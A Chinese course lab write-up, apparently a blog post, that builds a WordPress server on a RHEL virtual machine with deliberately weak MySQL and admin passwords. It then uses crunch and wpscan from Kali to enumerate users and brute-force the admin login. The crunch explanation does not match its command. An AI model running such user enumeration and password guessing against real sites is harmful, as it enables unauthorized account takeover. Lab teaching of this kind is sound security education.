实验五 破解wordpress用户名及口令---http安全

本实验针对动态网站后台管理员用户及口令进行攻击,需要搭建wordpres个人博客网站。
需要两个虚拟机,Kali虚拟机作为攻击主机,rhel作为wordpress服务器平台(IP:192.168.111.128)。

第一部分:架设wordpress

1、配置基本apache服务。
[root@localhost 桌面]#yum install -y httpd
[root@localhost 桌面]#service httpd start
2、配置CGI动态网站
查看主配置文件:有如下配置:LoadModule cgi_module modules/mod_cgi.so
表明cgi模块已自动挂载。
修改主配置文件httpd.conf:
[root@localhost 桌面]#vim /etc/httpd/conf/httpd.conf
scriptAlias /cgi-bin/ “/var/www/cgi-bin/”
<Directory “/var/www/cgi-bin”>
AllowOverride None
Options ExecCGI -Indexes (修改后,原来为none)
Order allow,deny
Allow from all

并添加以下一行:AddHandler cgi-script .cgi
3、重启服务:
[root@localhost 桌面]#service http restart
4、创建测试文件:
[root@localhost 桌面]#cd /var/www/cgi-bin
[root@localhost cgi-bin]# cat >hellolinux.cgi (这里也可以用vim来创建 )
把以下语句写进hellolinux中
#!/usr/bin/perl
print “Content-type:text/plain\n\n”;
print “hello linux\n”;
#

5、[root@localhost cgi-bin]# chmod 755 /var/www/cgi-bin/*
在这里插入图片描述

6、安装PHP软件包
[root@localhost cgi-bin]# cd /yum.soft/Packages/

[root@localhost Packages]#yum -y install php*
7、测试php
[root@localhost Packages]#vim /var/www/html/info.php

<?php
phpinfo();
?>

然后重启服务
[root@localhost Packages]#Service httpd restart

7、测试php页面
在这里插入图片描述

9、安装perl相关包
[root@localhost Packages]# rpm -ivh perl-DBI-1.609-4.el6.i686.rpm
Preparing… ########################################### [100%]
package perl-DBI-1.609-4.el6.i686 is already installed
[root@localhost Packages]# rpm -ivh perl-DBD-MySQL-4.013-3.el6.i686.rpm
Preparing… ########################################### [100%]
package perl-DBD-MySQL-4.013-3.el6.i686 is already installed
10、安装mysql相关包:
[root@localhost Packages]# rpm -ivh mysql-5.1.52-1.el6_0.1.i686.rpm
Preparing… ########################################### [100%]
package mysql-5.1.52-1.el6_0.1.i686 is already installed
[root@localhost Packages]# rpm -ivh mysql-server-5.1.52-1.el6_0.1.i686.rpm
Preparing… ########################################### [100%]
package mysql-server-5.1.52-1.el6_0.1.i686 is already installed
[root@localhost Packages]# rpm -ivh mysql-test-5.1.52-1.el6_0.1.i686.rpm
Preparing… ########################################### [100%]
package mysql-test-5.1.52-1.el6_0.1.i686 is already installed
11、启动mysql服务
[root@localhost Packages]# service mysqld start
正在启动 mysqld: [确定]
[root@localhost Packages]#
13、设置mysql管理员密码:
[root@localhost Packages]# mysqladmin -u root password mysql
14、启动mysql服务
[root@localhost Packages]# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.1.52 Source distribution
Copyright © 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
mysql>
15、创建wordpress数据库
mysql> create database wordpress;
16、创建一个专用的wordpress blog管理用户
mysql> grant all on wordpress. to wordpress@‘localhost’ identified by ‘123456’;
Query OK, 0 rows affected (0.00 sec)
若数据库与php服务不在一台机器上,可以将localhost改为ip地址。
17、刷新权限,是新用户生效:
mysql> flush privileges ;
Query OK, 0 rows affected (0.00 sec)
18、查看用户对应权限
mysql> show grants for wordpress@‘localhost’;
在这里插入图片描述
19、解压缩wordpress至/var/www/html(把压缩包复制到虚拟机上)
[root@localhost Packages]#Tar -xvf wordpress-4.9-zh_CN.tar.gz
[root@localhost Packages]# mv wordpress/ /var/www/html*
[root@localhost Packages]# cd /var/www/html
20、[root@localhost html]# cp wp-config-sample.php wp-config.php
[root@localhost html]# vim wp-config.php
在这里插入图片描述
21、安装wordpress,既输入http://192.168.111.128/index.php
ip地址为 虚拟机的地址
在这里插入图片描述

21、配置wordpress,注意由于是实验环境此用户名和密码要简单一些,为下边的攻击实验
节省时间。
在这里插入图片描述
在这里插入图片描述

23、启动wordpress
在这里插入图片描述

第二部分:wordpress的渗透

1、打开Kali虚拟机,保证与wordpres主机的联通。
在这里插入图片描述
2、生成密码字典文件:
#crunch 3 3 zph -o passlist.txt
crunch为自动生成密码字典文件的程序,此命令的含义为生成 6位长度密码字符由123456组成的密码文件passlist.txt
crunch min max characterset -o passlist.txt min 密码的最短长度,max密码的最大长度,characterset 密码含有的字符集。这一步可以根据在配置wordpress时用户的密码具体情况自己设置。

在这里插入图片描述
3、探测wordpress基本信息:
#wpscan --url http://192.168.111.128:80/
(192.168.111.128为wordpress ip)
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N] 此提示直接回车
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

以上为wordpress基本信息,查看你的wordpress,能够得到哪些信息。
4、探测wordpress后台管理员用户名及登录口令:
#wpscan --url http://192.168.111.128 -e u
在这里插入图片描述
得到以上结果,后台管理员为zph,未探测出登陆密码。
5、继续探测后台用户登陆密码:
#wpscan --url http://192.168.111.128 --wordlist /root/passlist.txt --username zph
成功:注意passlist.txt需要指明路径

在这里插入图片描述

成功!

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值